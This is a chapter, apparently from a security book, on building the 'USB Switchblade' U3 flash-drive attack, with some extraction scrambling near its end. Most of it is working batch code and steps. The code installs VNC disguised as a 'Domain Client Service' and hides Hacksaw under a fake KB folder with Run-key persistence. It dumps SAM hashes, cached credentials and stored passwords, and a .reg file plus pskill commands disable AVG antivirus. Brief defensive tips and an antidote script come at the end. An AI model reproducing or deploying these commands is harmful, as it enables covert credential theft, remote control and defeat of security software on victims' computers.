Inside the Switchblade 33 TightVNC TightVNC is a remote-control software package that is provided free of charge (GNU General Public License) A with full source-code availability. It provides a stable cli- ent or server remote utility, permitting graphical desktop representations of a target UNIX and Windows platforms via the local network or Internet. This version of VNC provides enhanced capabilities such as file transfers, mirrored drivers (effi- cient screen updates), remote desktop scaling, and a new Tight encoding with JPEG compression, which optimizes slow connections generating significantly less traf- fic. Browser access is also included via an HTTP server and a Java viewer applet. Two passwords are supported for read-only and full control access. TightVNC is sustained by Constantin Kaplinsky with the assistance of multiple corporations who participate in development and life-cycle support. Updated software can be found at www.tightvnc.com/download.php. XCOPY ".\vnc\*.*" "%systemroot%" /c /y SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" 2>&1 SC description WinVNC "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." 2>&1 REGEDIT /s .\vnc.reg 2>&1 NET START WinVNC 2>&1 The network statistics command Hacksaw This version of the USB Switchblade provides an option to install Hacksaw. It provides the typical functions that were covered in Chapter 1, “USB Hacksaw,” with some minor tweaks. This original version of the USB Switchblade transferred the log files contain- ing the output back to the writable portion of the USB ash drive. While this feature is still available, the addition of Hacksaw allows the logs to be sent via e-mail of the users choosing. The sbs.exe will still run in the background and transfer the data of USB drives that are inserted into the installed system. The supported version of the Hacksaw program is included with the download package provided in the next section. MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1 XCOPY .\HS\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY .\HS\*.* "%appdata%\sbs" /y 2>&1 A www.gnu.org/copyleft/gpl.html NOTE Look at the clever display name and service description inserted in the script below put in place to deter an uninformed user from stopping it. chapter 2 USB Switchblade34 REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs. lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\ Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs. exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1 COPY ".\send.bat"+%include%\HS.dat" "%systemroot%\$NtUninstall KB931337$\send.bat" || COPY ".\send.bat"+%include%\HS.dat" "%appdata%\sbs\send.bat" 2>&1 COPY %include%\HS2.dat" "%systemroot%\$NtUninstallKB931337$\ stunnel.conf" || COPY %include%\HS2.dat" "%appdata%\sbs\stunnel. conf" 2>&1 ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB "%appdata%\sbs" +s +h 2>&1 .\SBS.lnk & .\SBS2.lnk WirelessKeyView WirelessKeyView is a utility from Nirsoft. It can recover all wireless network secu- rity keys for the Wireless Encryption Protocol (WEP) and Wi-Fi Protected Access (WPA) that are contained in the Wireless Zero Conguration (XP) and WLAN AutoConfig (Vista) services on a system. This tool’s command options give you the ability to sort or export to various formats. The following Web site can be checked if updated versions are required: www.nirsoft.net/utils/wireless_key.html. .\wifike.exe /stext %tmplog% >> %log% 2>&1 Password Dump PwDump is a name given to several types of programs with multiple developers that are able to provide an output of the NT LAN Manager (Windows NTLM) and LAN Manager (LM) password hashes for user accounts contained in the local secu- rity accounts manager (SAM). This tool is used to extract raw passwords from a Windows SAM le. Once you have extracted the hashes from the Windows SAM le, an alternate program can be used to nd the exact text passwords used on the system. The next section will describe the additional tools required to interpret the hashes derived from this program. The most recent version of the software can be found at www.tarasco.org/security/pwdump_7/index.html. .\pwdump 127.0.0.1 >> %log% 2>&1 Fizzgig Dump Fgdump was developed for use in environments with AV and other detection software enabled. It includes the PwDump and CacheDump utilities in a wrapper to minimize the number of issues that have been increasing while running these tools individu- ally. The development of this tool appears to be in full swing, with extensive auditing targeted for Windows domains and their respective trust relationships (additional tools are required for this). This tool is being provided in addition to the individual Inside the Switchblade 35 PwDump and CacheDump utilities in case problems are encountered running them natively. The updated release of this software can be found at http://swamp.foofus. net/fizzgig/fgdump/downloads.htm. %U3%\fgdump.exe" -c >> %log% 2>&1 Network Password Recovery Network Password Recovery allows an administrator to recover all passwords (includ- ing domain) of the current logged-on user used for establishing connections to network shares. It can also retrieve .NET Passport passwords for sites if they were saved in this manner. External credentials les can also be parsed so long as the last logged-on account password is known. This is another utility written by Nirsoft, and current ver- sions can be found at www.nirsoft.net/utils/network_password_recovery.html. .\netpass.exe /stext %tmplog% >> %log% 2>&1 Mail Password Viewer Mail PassView is a tool that can reveal the password and account details for numer- ous e-mail clients. The supported clients include Outlook Express, Microsoft Outlook 2000/2002/2003/2007, Windows Mail, Windows Live Mail, IncrediMail, Eudora, Netscape 6.x/7.x (without master password encryption), Mozilla Thunderbird (with- out master password encryption), Group Mail Free, Yahoo! Mail (if stored in Yahoo! Messenger application), Hotmail/MSN mail (if stored in MSN/Windows/Live Messenger application), and Gmail (if stored in Gmail Notier application, Google Desktop, or by Google Talk). Once again, this is another Nirsoft tool and updates can be found at www.nirsoft.net/utils/mailpv.html. .\mailpv.exe /stext %tmplog% >> %log% 2>&1 Firefox Password Recovery FirePassword is a tool designed to decrypt the credentials from the Mozilla Firefox database. Firefox records username and password details for every Web site the user authorizes and stores them an encrypted database. The master password will be needed if it is set; otherwise, it will not be able to display these. Some sites also prevent the saving of passwords in a browser, which is another limitation that should be considered. Check the following site for the most recent updates to this tool: www. securityxploded.com/download/FirePassword_bin.zip. .\FirePassword.exe >> %log% 2>&1 Internet Explorer Password Viewer Internet Explorer PassView is another tool from Nirsoft designed to provide pass- word management, which can reveal passwords that have been stored in the browser. This utility can recover three different types of passwords: AutoComplete, HTTP authentication passwords, and FTP. It gathers these by parsing Windows protected storage, the registry, and a credential le. Known issues exist starting with Internet chapter 2 USB Switchblade36 Explorer 7.0 because Microsoft is changing the way in which some passwords are stored, so limitations may be encountered. The most recent versions of this software include the ability to read ofine or external sources if you know the password of the last logged-on user for this profile. Check this site if updated versions are required: www.nirsoft.net/utils/internet_explorer_password.html. .\iepv.exe /stext %tmplog% >> %log% 2>&1 Messenger Password Recovery MessenPass is another password recovery tool that reveals the passwords of com- mon instant-messenger applications. It can be used only to recover the passwords for the current logged-on user on the local computer, and it only works if you chose the “remember your password” option in the programs. This tool cannot be used for grabbing the passwords from other user profiles. When running MessenPass, it auto- matically detects the instant-messenger applications installed on the target system, decrypts the passwords, and displays all user credentials found. This Nirsoft tool can be found at www.nirsoft.net/utils/mspass.html. .\mspass.exe /stext %tmplog% >> %log% 2>&1 CacheDump CacheDump was designed to capture the credentials of a domain user who is cur- rently logged on to a system. It targets Windows’ inherent ofine caching techniques performed by the Local Security Authority (LSA) system service. This service uses a cached version of the password to allow users to log on when a domain controller is unavailable to authenticate them. This tool creates a temporary service, allowing it to grab hash values of passwords, which can be taken ofine for later cracking. The most current release of this program can be found at www.hacktoolrepository.com/ category/9/Passwords. .\cachedump.exe >> %log% 2>&1 Protected Storage Password Viewer Protected Storage PassView is yet another Nirsoft tool designed to divulge passwords housed on a system stored by Internet Explorer, Outlook Express, and MSN Explorer. This tool also has the capability to reveal information stored in the AutoComplete strings of Internet Explorer. If an update for this tool is required, check the following location: www.nirsoft.net/utils/pspv.html. .\pspv.exe /stext %tmplog% >> %log% 2>&1 Product Key Recovery ProduKey, a tool from Nirsoft, presents the product identifier and the associated keys for Microsoft products installed on the system. Microsoft Ofce 2003/2007, Exchange, SQL, and even operating system (including Windows 7) keys can be extracted using this. It is also capable of gathering keys from remote systems if permissible and includes additional customizable command options for your Inside the Switchblade 37 convenience. The following location contains additional information regarding this tool: www.nirsoft.net/utils/product_cd_key_viewer.html. .\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername% >> %log% 2>&1 History Scraper A preconfigured VB script has been included in the Switchblade download package to provide a summary of the most recently viewed Web sites on the target machine. No additional files or updates are required in order for this to complete. CSCRIPT //nologo .\DUH.vbs >> %log% 2>&1 Windows Updates Lister WinUpdatesList will display all of the Windows updates, including hotxes, that are installed in a local or remote system. Hotx information includes the associated files, and the user interface will even provide a link to the Microsoft site, which includes detailed information related to the specific update. This tool applies to Windows 98, ME, 2000, and XP but is not yet available for Vista and later. The fol- lowing Web site contains additional information regarding this tool: www.nirsoft. net/utils/wul.html. .\wul.exe /stext %tmplog% >> %log% 2>&1 Network Statistics The network statistics command displays active network connections, listening ports, associated processes, and a variety of other network statistics. This tool is already included on all relevant Windows systems. netstat.exe -abn >> %log% 2>&1 Port Query Portqry.exe is a command-line utility that is often used to troubleshoot network con- nectivity issues. Portqry.exe is included on systems based on Windows 2000, XP, and 2003 and can be downloaded for use on others. The utility reports the status of Transmission Control Protocol and User Datagram Protocol ports on a desired machine. It is able to report listening, nonlistening, and filtered ports individually by listing or in a sequential range. The most updated version of this tool can be found at www.microsoft.com/downloads/details.aspx?familyid=89811747-c74b-4638-a2d5- ac828bdc6983&displaylang=en. .\portqry -local -l %tmplog% >> %log% 2>&1 The tools described above are already contained in the USB Switchblade pack- age download provided in the next section. If you intend to use the tools included in Switchblade, it would be in your best interest to familiarize yourself with each independently. Each of these tools provides additional parameters and customization chapter 2 USB Switchblade38 options depending on your needs. The attack recreation included below will provide you with a basic understanding of how these are commonly deployed. Switchblade Assembly As previously stated, the ultimate goal of USB Switchblade is to simplify the recov- ery of critical information from computers running Windows 2000 or later. With administrator access, it is able to retrieve password hashes, LSA secrets, IP informa- tion, and much more. This section will demonstrate how to build and deploy a U3 ash drive with the -=GonZor=- SwitchBlade technique. WARNING If any AV applications are running on the machine you are using to download or create the U3 Switchblade, problems will be encountered. Most antivirus software will recognize the tools contained in Switchblade as malicious and will attempt to remove them. To head off any problems, disable antivirus on the system you are using to build Switchblade. NOTE If User Account Control (UAC) is enabled on Vista or Windows 7, the user will be prompted to allow the execution of the tools within the Switchblade. A dialogue box stating “Windows need your permission to continue” will be displayed. This must be disabled on these systems when building the Switchblade and to enable automated retrieval on target systems. This first set of directions included will build a default version of Switchblade. These are provided for quick reference should you encounter an updated release of the Switchblade software, which may better suit your needs. Customization instructions will follow these procedures to allow you to update or add to existing distributions. 1. The Switchblade v2.0 payload needs to be downloaded. This package can be found at http://rapidshare.com/les/113283682/GonZors_SwitchBlade-V2.0.zip. 2. If you are using an XP system, the Universal Customizer software previously downloaded for Chapter 1, “USB Hacksaw,” can be used to complete this process. If you have Vista or 7 systems, download the compatible Universal Customizer at http://rapidshare.de/files/40767219/Universal_Customizer_1.4.0.2.rar.html. 3. Create a separate directory for each programs you just downloaded and unzip the files into their respective folders. 4. Place the U3CUSTOM.iso from the Switchblade folder into the bin folder of the Universal Customizer directory. 5. Insert your U3 USB drive. 6. Launch the Universal Customizer by executing Universal_Customizer.exe. Inside the Switchblade 39 7. Follow the on-screen instructions and prompts until complete, accepting the default selections where applicable. Steps 9–13 in the “How to Recreate the Attack” section of Chapter 1, “USB Hacksaw,” provides detailed directions and screenshot illustrations for these steps. 8. If you receive a failure at the end, repeat steps 5 and 6 at least three times. If failures persist, download and install the latest version of the LaunchPad installer (lpinstaller.exe) at http://mp3support.sandisk.com/downloads/LPInstaller.exe. Sporadic results can be encountered with this program as well, so let your tena- cious side shine through. 9. Once you have successfully applied the Switchblade ISO using the Universal Customizer process, place the SBCong.exe and ip.shtml from the Switchblade directory onto the removable disk partition and run SBCong.exe. 10. Enable the desired tools by checking the appropriate boxes and entering all other required information. After making your changes, select Update Config. The next section will describe these and other steps in more detail and pro- vide caveats for deployments on related systems. This completes a basic USB Switchblade installation for the GonZor package. Customizing the Original Payload The steps below will walk you through updating an existing tool within a payload. Testing of the package previously prescribed produced some errors when trying to parse the updated target applications. Changes were made to the wget command to properly output an external IP address in the log le. Additional procedures are provided to disable AVG antivirus to smooth the automated initialization of the Switchblade script. In order to modify the original payload, you will need to extract the les from the GonZor ISO. This process can be used to update any of the tools used in the payload. The following will be needed to complete this customization. • Any U3 drive • A working version of the GonZor USB Switchblade • The current version of PsTools or the PsKill utility specically. The download location for this was provided in Chapter 1, “USB Hacksaw.” • Download and install the current version of MagicISO. This tool can be down- loaded from www.magiciso.com/. NOTE At the time of this writing, the most recent version of the Switchblade payload was v2.0. 1. Create a separate folder for each program you just downloaded and unzip the files into their respective folders. 2. Create a new directory to extract the original GonZor ISO. We will refer to this directory as %GONZOR_ISO%\ in the following steps. 3. Copy the U3CUSTOM.iso from the GonZor SwitchBlade payload directory into %GONZOR_ISO%\. chapter 2 USB Switchblade40 4. Open MagicISO and browse to the U3CUSTOM.iso. Right-click the U3CUSTOM. iso le and extract to %GONZOR_ISO%\. 5. Copy pskill.exe to %GONZOR_ISO%\ SYSTEM\SRC. NOTE AVG 9.0 service name has changed in the registry. For this reason, there are two driver entries specified in the file for both AVG 8.5 and AVG 9.0 in the next step. If you encounter a newer release of AVG, this registry file may need to be adjusted to work in an updated environment. 6. Next, create a .reg le to disable the AVG antivirus services and set them to take no action in the event of a service failure. Copy and paste the text given below into a Notepad file and save it as AVKill.reg. Any other services of concern can be added to this file for disablement. The Start and FailureAction values included here can be duplicated for the additional services. Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg8wd] "Start"=dword:00000004 "FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00, 00,53,00,65,\ 00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60, ea,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg9wd] "Start"=dword:00000004 "FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00, 00,53,00,65,\ 00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60, ea,00,00 7. Save this Notepad file as AVKill.reg to %GONZOR_ISO%\SYSTEM \SRC \. 8. Locate the go.bat le in %GONZOR_ISO%\SYSTEM \ SRC. Right-click and select Edit, and then find the 0.dat line in this file. 9. In the go.bat, enter the following text. Killing of other processes is included as a fail-safe due to inconsistencies found between the various versions of Windows operating systems. If you added other services to the registry file in step 6, their associated processes must be included here. ECHO >> %log% 2>&1 ECHO + + >> %log% 2>&1 ECHO + [AVGKill] + >> %log% 2>&1 ECHO + + >> %log% 2>&1 ECHO AVG services have been disabled >> %log% 2>&1 REGEDIT /s .\avkill.reg >> %log% 2>&1 .\pskill -t avgam.exe >> %log% 2>&1 Inside the Switchblade 41 .\pskill -t avgrsx.exe >> %log% 2>&1 .\pskill -t avgwdsvc >> %log% 2>&1 .\pskill -t avgnsx.exe >> %log% 2>&1 .\pskill -t avgcsrvx.exe >> %log% 2>&1 .\pskill -t avgtray.exe >> %log% 2>&1 .\pskill -t agrsmsvc.exe >> %log% 2>&1 .\pskill -t avgwdsvc.exe >> %log% 2>&1 ) IF EXIST %include%\19.dat" ( ECHO 10. Search and find the 1.dat line in the same file. Place a “;” at the start of these commands used for the wget. The wget commands should now appear like the below statements. ;.\wget.exe %eipurl% output-document=%tmplog% 2>&1 ;ECHO. >> %tmplog% 2>&1 ;COPY %log%+%tmplog%* %log% >> NUL ;DEL /f /q %tmplog% >NUL 11. Insert the following wget command line just above the old wget command. .\wget -q -O - http://whatismyip.com/automation/n09230945.asp >> %log% 2>&1 12. Save and close the file. 13. Copy and paste the entire contents of %GONZOR_ISO%\ (except the U3CUSTOM.iso) into the U3Custom folder of the Universal Customizer. TIP Ensure that the Universal Customizer\U3Custom directory is empty before you copy the updated files into it. Only files that you want included in the final ISO should be contained in this folder. 14. Run the ISOCreate.cmd in the root of the Universal Customizer directory to create the updated ISO. The output provided should appear similar to Figure 2.1. 15. Press any key when prompted to complete the build. 16. The updated ISO will be placed into the bin directory automatically. 17. Insert your U3 drive and run the Universal_Customizer.exe to load the updated ISO. 18. Follow the prompts until complete, accepting the default selections, and provide a password when required. Steps 9–13 in the “How to Recreate the Attack” section of Chapter 1, “USB Hacksaw,” provide screenshot illustrations for this process. 19. Insert the U3 drive and place the SBCong.exe (this le is located in the unpacked Switchblade payload) onto the removable disk partition and run it. 20. Select the tools from the payload that you want to run by checking the boxes, as shown in Figure 2.2. The output of this script will be sent to a log le on chapter 2 USB Switchblade42 FIGURE 2.1 Universal Customizer ISOCreate Command Window FIGURE 2.2 GonZor Payload Configuration Options Dialogue [...]... configuration when prompted 23 You have now established a customized version of the -=GonZor=- Payload v2.0 on your U3 smart drive, which can be used to retrieve all kinds of goodies once it is plugged into a computer with administrative privileges As you can see, it wasn’t very difficult to customize a smart U3 USB Use extreme caution when anyone requests to insert his or her USB flash drive into your... the installation executable and click Next, as seen in Figure 2 .3 3 Select all components, as shown in Figure 2.4, and click Next 4 Install in the default directory, as indicated in Figure 2.5, and click Next 5 Install the tables in the default directory, as depicted in Figure 2.6, and click Install 43 44 CHAPTER 2  USB Switchblade Figure 2 .3 ophcrack Installation Dialogue Figure 2.4 ophcrack Installation... service accounts This vulnerability affected Windows 2000, XP, 20 03, Vista, and 2008 Defensive Techniques There are many defensive strategies that can be applied on Windows systems to mitigate the USB Switchblade capabilities The tactics outlined in the “Defending against This Attack” section in Chapter 1, USB Hacksaw,” apply to the USB Switchblade as well Proceed with caution when implementing any... as owned Evolving Aspects This USB Switchblade compilation appears to be a favorite at the Hak.5 community site Adaptations are abundant, and many of the notorious hard-line hacking and forensic-based tool suites are finding their way into these types of preconfigured packages Multiple versions already exist on the main USB Switchblade site.B (Some Bhttp://www.hak5.org /usb- switchblade Evolving Aspects... CD-ROMs or DVDs 14 Next, copy and paste the results from the [Dump SAM PWDUMP] section of the Switchblade log file on the U3 USB drive into a separate Notepad file 15 Save the file in a known location 16 In ophcrack, click Load and select PWDUMP file, as depicted in Figure 2. 13 17 Navigate to where you saved the Notepad file (step 15) and select it 18 The LM hash from the file will be displayed in... suggested improvements System Execution Prevention and USB Antidote Perhaps you inadvertently inserted the USB Switchblade into a system or someone accidentally used the drive while you were unaware These unintentional infections can be a burden, but fortunately there are methods to ease these situations Pressing and holding down the Shift key while inserting a USB drive can suppress the autorun on a particular... and :: there a lot more things which can be added, but :: this is just to show that the U3 exploit can :: also be used for whitehat purposes :: The normal USB antidote, works for both Home and :: Professional start csrss.exe ping -n 2 localhost > nul services.exe -uninstall -name:"WinVNC" IF EXIST C:\WINDOWS\System32\taskkill.exe ( taskkill /F /IM sbs.exe Dhttp://www.hak5.org/packages/files/antidote.rar... applications This list can be used to provide a potential target for man-in-themiddle (MITM) attacks, which could be used to intercept communication and gather credentials and related information about the particular site These are just a small sampling of jeopardizing actions that could be accomplished if a tool such as the USB Switchblade was successfully deployed The data provided by this suite of tools not... free fast was used in this example 13 Navigate to the location where you saved the table, as seen in Figure 2.12, and click Install Keep in mind that storing the rainbow tables on a fast medium like Figure 2.7 ophcrack Installation Dialogue Inside the Switchblade Figure 2.8 ophcrack Installation Dialogue Figure 2.9 ophcrack Installation Dialogue 47 48 CHAPTER 2  USB Switchblade Figure 2.10 ophcrack... entry of 00000001 would enable this feature and is the default state Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] "forceguest"=dword:00000000 53 54 CHAPTER 2  USB Switchblade The following snippet contains the code used in the win.reg file Setting the account value to the entry below will hide it from plain view As in the above example, a value of 00000001